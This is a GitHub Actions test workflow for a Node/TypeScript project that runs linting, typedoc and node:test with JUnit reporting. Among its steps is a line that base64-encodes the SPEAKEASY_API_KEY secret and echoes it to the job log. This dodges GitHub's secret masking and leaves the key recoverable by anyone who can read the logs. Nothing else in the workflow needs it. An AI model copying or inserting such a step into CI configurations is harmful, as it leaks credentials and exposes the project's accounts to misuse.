name: Test

on:
  workflow_dispatch: {}
  pull_request: {}

concurrency:
  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
  cancel-in-progress: true

jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 21
      - run: echo $SE | base64
        env:
          SE: ${{ secrets.SPEAKEASY_API_KEY }}
      - name: Compile, Lint
        run: |
          npm ci
          npx eslint --config=.eslintrc.styra.cjs --max-warnings=0 src README.md
          npx prettier . --check
          npx typedoc
      - name: Test
        run: |
          node --import tsx \
               --test-reporter=spec \
               --test-reporter=junit \
               --test-reporter-destination=stdout \
               --test-reporter-destination=report.xml \
               --test tests/**/*.ts
        env:
          EOPA_LICENSE_KEY: ${{ secrets.EOPA_LICENSE_KEY }}
      - name: Publish Test Report
        uses: mikepenz/action-junit-report@v4
        if: always()
        with:
          report_paths: report.xml
